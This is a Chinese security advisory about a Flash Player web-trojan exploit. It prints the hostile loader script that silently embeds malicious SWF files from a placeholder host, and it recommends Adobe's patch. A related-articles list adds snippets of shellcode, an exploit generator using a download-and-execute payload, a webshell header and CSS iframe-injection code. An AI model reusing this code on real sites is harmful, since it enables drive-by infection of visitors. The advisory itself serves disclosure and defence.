FLASH网马官方补丁
最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:
<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write('<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>');
document.write('<param name=”allowScriptAccess” value=”sameDomain”/>');
document.write('<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('<param name=”quality” value=”high”/>');
document.write('<param name=”bgcolor” value=”#ffffff”/>');
document.write('<embed src=”http://www.XXX.cn/flash/XX.swf” src=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('</object>');
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script> 以下为正常的FLASH文件使用的脚本:
// Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop();
该恶意FLASH部分内容如下:
建议:
厂商补丁: Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.adobe.com/go/getflash
相关推荐
-
FLASH网马官方补丁
最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令.以下为调用页内容: <script> window.onerror=function(){return true;} function init(){window.status="";}window.onload = init; if(document.coo
-
一个网马的tips实现分析
cookie示例代码: 复制代码 代码如下: //存放 function setCookie(sVar, sVal){ theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; document.cookie = theCookie;} shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9
-
网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
'code by lcx On Error Resume Next Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" ) url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MO
-
aspx超强木马查杀与防范(web网马)
复制代码 代码如下: <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%><%@ import Namespace="System.IO"%><
-
关于脚本调用外部对像和类型库
先举个例子,最近的flash网马调用: var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(","); 这个ShockwaveFlash.ShockwaveFlash.9从何而来,用exescope打开flash9f.ocx选择typelib,即可看到ShockwaveFlash.ShockwaveF
-
FLASH 0DAY 详细分析和总结图文
最近FLASH出了几个0DAY,论坛也帖了相关的新闻信息(请见:http://bbs.tian6.com/viewthread.php?tid=4434&extra=&page=1).我也约在5天前开始对此进行研究.我记得同时间邪恶八进制也有人开始同样的研究.到目前为止,该0DAY可以影响到90.115这个版本.而邪八那边的研究,先在两天前宣布成功完成.这又给我带来不小的压力..(一)作为研究的初步,通过TIM的帮助,我从几个被挂马的页面得到2个SWF网马.反编译后得知这两个SWF在获得本
-
预防网页挂马的方法总结
预防网页挂马的方法总结: 在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的工作原理及种类.常见方式.执行方式.如何检测网页是否被挂马.如何清除网页木马.如何防止网页被挂马. 1:网页挂马工作原理的种类. (1)工作原理: 作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭
-
动网升级疑难集合(1)
-- 作者:飞天侠-- 发布时间:2006-4-26 1:08:52 -- 运行时错误记录与解决方案(动网) 1.问: Microsoft VBScript 运行时错误 错误 '800a01a8' 缺少对象: 'UserSession.documentElement' /bbs/inc/Dv_ClsMain.asp,行 518 升级SP1后出现这个错误!!是哪里出现问题呢? 答: 试试执行升级包中的更新服务器缓存 2.问:但在论坛用户组(等级)管理时出错如下: Microsoft VBSc
-
真正能用,还有点效果的CSS挂马代码的方法
网上流行的: body { background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")') } //此方法会使主页不正常.返回一片空白. 用弹窗. body { background-image: url('javascript:open("http://192.168.0
-
利用css实现挂马的代码
body { background-image: url('javascript:document.write("<script src=http://www.jb51.net/9xiao.js></script>")') } 9xiao.js内容是 document.write("<iframe src=你的网马 width=0 height=0></iframe>")